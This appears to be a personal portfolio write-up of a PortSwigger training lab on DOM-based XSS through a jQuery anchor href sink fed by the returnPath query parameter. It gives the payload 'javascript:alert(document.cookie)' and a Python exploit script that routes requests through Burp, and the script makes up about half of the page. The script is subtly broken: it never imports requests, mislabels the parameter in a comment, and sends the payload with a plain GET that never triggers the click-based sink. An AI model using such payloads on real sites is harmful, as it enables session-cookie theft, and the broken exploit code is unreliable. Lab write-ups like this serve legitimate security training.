Shubham Ranpise

Back

XSS Lab 5

DOM-based XSS via jQuery $ selector and href attribute using location.search source

portswigger-labs content

DOM XSS in jQuery anchor href attribute sink using location.search source#

This lab demonstrates a DOM-based cross-site scripting (XSS) vulnerability on the Submit Feedback page. The page uses the jQuery $ selector function to locate an anchor element and sets its href attribute using data from location.search. By manipulating the returnPath query parameter, arbitrary JavaScript can be executed when the user clicks the “back” link. This illustrates how unsanitized input directly used in the DOM can lead to XSS.

How Exploit Works#

  • The returnPath query parameter is used by jQuery to set the href of the “back” link.
  • Any unsanitized input is inserted into the DOM.
  • By setting returnPath=javascript:alert(document.cookie), we can trigger an alert containing cookies when clicking “back”.
  • This confirms a DOM-based XSS vulnerability using the jQuery anchor href sink.

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

import sys
import urllib3

# Disable SSL warnings for Burp Suite
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

def check_burp():
    # Check if Burp Suite is running and listening on the configured proxy.

    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)

def exploit_xss(url, payload):
    # Exploit XSS in search parameter.
        uri = f"/feedback?returnPath={payload}"
        res = requests.get(url + uri, verify=False, proxies=proxies)
        res.raise_for_status()
        session = requests.Session()
        res = session.get(url, verify=False, proxies=proxies)
        if "Congratulations" in res.text:
            print("[+] Lab solved 🎉")
            return True
        else:
            print("[-] lab not solved.")

def main():
    # Entry point of the script.

    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)

    url = sys.argv[1].strip()

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define XSS payload
    payload = 'javascript:alert(document.cookie)'

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
python

See more portswigger-labs